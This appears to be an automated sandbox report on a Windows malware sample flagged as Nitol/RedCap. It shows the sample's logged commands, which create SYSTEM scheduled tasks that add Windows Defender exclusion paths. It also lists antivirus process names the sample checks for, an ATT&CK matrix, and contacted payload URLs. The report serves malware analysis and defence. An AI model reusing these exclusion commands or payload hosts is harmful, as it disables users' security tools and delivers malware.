Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\XY3LL0.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_00007FF8FDF9FD40 cpuid

7_2_00007FF8FDF9FD40

Source: C:\Users\user\Documents\XY3LL0.exe	Code function: GetLocaleInfoA,		7_2_000000014000F370
Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exe	Code function: GetLocaleInfoA,		44_2_00636B1A

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_000000014000A370

Source: C:\Users\user\Documents\XY3LL0.exe

Code function: 7_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

7_2_0000000140005A70

Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: byHW9q.exe, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: XY3LL0.exe, 00000007.00000002.2002112883.00000000028A8000.00000002.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3241107592.00000000033DD000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 42.2.byHW9q.exe.3b703e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.byHW9q.exe.3b703e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.byHW9q.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 42.2.byHW9q.exe.3b703e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.byHW9q.exe.3b703e8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.byHW9q.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTR

Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		7_2_00000001400042B0
Source: C:\Users\user\Documents\XY3LL0.exe	Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		7_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	431 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2976587-987347589.08.exe	17%	Virustotal		Browse
2976587-987347589.08.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\byHW9q\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\x736Pg9\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\byHW9q\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\x736Pg9\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\byHW9q\byHW9q.exe	0%	ReversingLabs
C:\Program Files (x86)\x736Pg9\QmbK8U.exe	0%	ReversingLabs
C:\Program Files (x86)\x736Pg9\tbcore3U.dll	78%	ReversingLabs	Win32.Adware.RedCap
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\XY3LL0.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$	0%	Avira URL Cloud	safe
http://%s/%d.dll	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif$	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat(	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/v	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/j	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/A5	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/A5	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifp	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifl	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003q5W;	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifi	0%	Avira URL Cloud	safe
https://662hfg.oss-cn-beijing.aliyuncs.com/pV	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.105	true	false	unknown
cvqthu.net	unknown	unknown	false	unknown
662hfg.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://662hfg.oss-cn-beijing.aliyuncs.com/Y5O;	2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$	2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp	2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif$	2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/v	2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat(	2976587-987347589.08.exe, 00000000.00000003.1791213251.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	false		high
http://%s/upx.rarC:	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/j	2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/	2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/A5	2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
